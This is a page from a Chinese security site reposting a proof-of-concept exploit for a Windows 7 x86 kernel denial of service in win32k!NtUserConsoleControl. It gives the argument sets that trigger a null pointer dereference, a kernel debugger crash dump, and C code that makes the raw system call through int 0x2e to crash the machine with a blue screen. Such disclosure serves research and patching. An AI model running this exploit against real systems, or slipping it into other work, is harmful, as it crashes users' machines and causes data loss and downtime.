首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Microsoft Windows Kernel win32k!NtUserConsoleControl Denial Of Service
来源:vfocus.net 作者:vportal 发布时间:2018-07-31  
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A
 
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system 
# call NtUserConsoleControl with the following arguments:
 
# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).
 
# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria 
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e            mov     ecx,dword ptr [esi]
 
# TRAP_FRAME:  8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0         nv up ei ng nz ac po nc
# cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????
# Resetting default scope
 
# CUSTOMER_CRASH_COUNT:  1
# DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT
# BUGCHECK_STR:  0x8E
# PROCESS_NAME:  Win32k-fuzzer_
 
# CURRENT_IRQL:  0
# LAST_CONTROL_TRANSFER:  from 9330fc27 to 93310641
 
# STACK_TEXT: 
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
 
# PoC code:
 
#include <Windows.h>
 
extern "C"
 
ULONG CDECL SystemCall32(DWORD ApiNumber, ...) 
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
 
 
int _tmain(int argc, _TCHAR* argv[])
{
 
int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
 
LoadLibrary(L"user32.dll");
 
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
 
return 0;
}
 
# The vulnerability has only been tested  in Windows 7 x86.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Allok MOV Converter 4.6.1217 B
·H2 Database 1.4.197 Informatio
·ipPulse 1.92 Denial Of Service
·fusermount Restriction Bypass
·ipPulse 1.92 - 'IP Address/Hos
·Charles Proxy 4.2 Local Root P
·WordPress Plugin Responsive Th
·Vtiger CRM 6.3.0 Authenticated
·NetScanTools Basic Edition 2.5
·SonicWall Global Management Sy
·QNap QVR Client 5.1.1.30070 -
·MicroFocus Secure Messaging Ga
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved